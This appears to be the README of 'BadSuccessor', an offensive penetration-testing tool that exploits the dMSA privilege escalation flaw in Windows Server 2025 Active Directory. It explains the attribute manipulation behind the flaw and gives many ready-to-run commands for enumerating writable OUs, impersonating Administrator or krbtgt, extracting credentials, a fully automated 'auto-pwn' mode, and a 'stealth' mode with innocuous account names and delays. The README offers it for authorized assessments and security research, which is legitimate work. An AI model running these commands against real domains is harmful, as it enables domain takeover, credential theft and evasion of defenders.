
Exploits the Windows Server 2025 dMSA privilege escalation vulnerability to enumerate writable OUs, escalate to arbitrary domain users, extract credentials, and enable domain takeover in authorized AD security assessments.
A penetration testing tool that exploits the dMSA (delegated Managed Service Account) privilege escalation vulnerability in Windows Server 2025 Active Directory environments.
This tool is for authorized penetration testing and security research purposes only. Use of this tool against systems without explicit written permission is illegal and unethical. The authors are not responsible for any misuse or damage caused by this tool.
IMPORTANT: This tool is under active development and testing.
We encourage the security community to:
By using this tool, you acknowledge that it is under active development and may require modifications for your specific environment.
BadSuccessor exploits a privilege escalation vulnerability in Windows Server 2025's delegated Managed Service Account (dMSA) feature. The vulnerability allows attackers with minimal permissions to escalate privileges to any user in the domain, including Domain Administrators.
This tool is based on the excellent research by Yuval Gordon from Akamai Technologies:
The vulnerability exists in the dMSA migration process where:
msDS-ManagedAccountPrecededByLink or ms-DS-Managed-Account-Preceded-By-Link to point to a target usermsDS-DelegatedMSAState or ms-DS-Delegated-MSA-State to 2 (migration completed)Additionally, the KERB-DMSA-KEY-PACKAGE structure contains the target user's password keys, enabling credential extraction.
pip3 install ldap3 pyasn1 pycryptodome
pip3 install impacket==0.12.0
Note: The tool has been tested with impacket 0.12.0. Version compatibility warnings are displayed at runtime.
# For DNS discovery
pip3 install dnspython
# For enhanced Kerberos support (system packages)
# Ubuntu/Debian
sudo apt-get install libkrb5-dev libgssapi-krb5-2
# RHEL/CentOS/Fedora
sudo yum install krb5-devel
CreateChild permissionWrite permissionGenericWrite permissionGenericAll permissiongit clone https://github.com/cybrly/badsuccessor.git
cd badsuccessor
pip3 install -r requirements.txt
chmod +x badsuccessor.py
ldap3>=2.9.1
pyasn1>=0.4.8
pycryptodome>=3.15.0
impacket==0.12.0
dnspython>=2.1.0
python3 badsuccessor.py -d <domain> -u <username> -p <password> [options]
# Simulate attack to verify viability
python3 badsuccessor.py -d corp.local -u john -p Password123 --dry-run --target Administrator
# Dry run with specific OU
python3 badsuccessor.py -d corp.local -u john -p Password123 --dry-run --target Administrator --ou-dn "OU=ServiceAccounts,DC=corp,DC=local"
# Check Windows Server 2025 schema support
python3 badsuccessor.py -d corp.local -u john -p Password123 --check-schema
# Find ALL writable OUs with detailed permissions
python3 badsuccessor.py -d corp.local -u john -p Password123 --enumerate
# List high-value targets
python3 badsuccessor.py -d corp.local -u john -p Password123 --list-targets
# Validate specific target account
python3 badsuccessor.py -d corp.local -u john -p Password123 --validate-target Administrator
# Basic attack against Administrator
python3 badsuccessor.py -d corp.local -u john -p Password123 --attack --target Administrator
# Stealth mode with innocuous naming
python3 badsuccessor.py -d corp.local -u john -p Password123 --attack --target Administrator --stealth --random-delay 30
# Attack with custom dMSA attributes
python3 badsuccessor.py -d corp.local -u john -p Password123 --attack --target krbtgt \
--dmsa-name legit_service --dmsa-description "Legitimate Service Account" \
--dmsa-display-name "Production Service"
# Attack with custom naming pattern
python3 badsuccessor.py -d corp.local -u john -p Password123 --attack --target Administrator \
--dmsa-pattern "svc{random}prod"
# Extract credentials for multiple users
python3 badsuccessor.py -d corp.local -u john -p Password123 --extract-creds --targets Administrator,krbtgt,svc_sql
# Auto-pwn mode (fully automated)
python3 badsuccessor.py -d corp.local -u john -p Password123 --auto-pwn
# List all sessions
python3 badsuccessor.py -d corp.local -u john -p Password123 --list-sessions
# Resume a previous session
python3 badsuccessor.py -d corp.local -u john -p Password123 --session-id corp.local_john_1234567890_abcd1234
# Clean up all dMSAs from a session
python3 badsuccessor.py -d corp.local -u john -p Password123 --cleanup-session SESSION_ID
# Clean up all dMSAs from current session
python3 badsuccessor.py -d corp.local -u john -p Password123 --cleanup-all
# Export enumeration results to JSON
python3 badsuccessor.py -d corp.local -u john -p Password123 --enumerate --export-json results.json
# Export to CSV
python3 badsuccessor.py -d corp.local -u john -p Password123 --enumerate --export-csv writable_ous.csv
# Generate HTML report
python3 badsuccessor.py -d corp.local -u john -p Password123 --enumerate --export-html report.html
# Combined operation with exports
python3 badsuccessor.py -d corp.local -u john -p Password123 --attack --target Administrator \
--export-json attack_results.json --export-html attack_report.html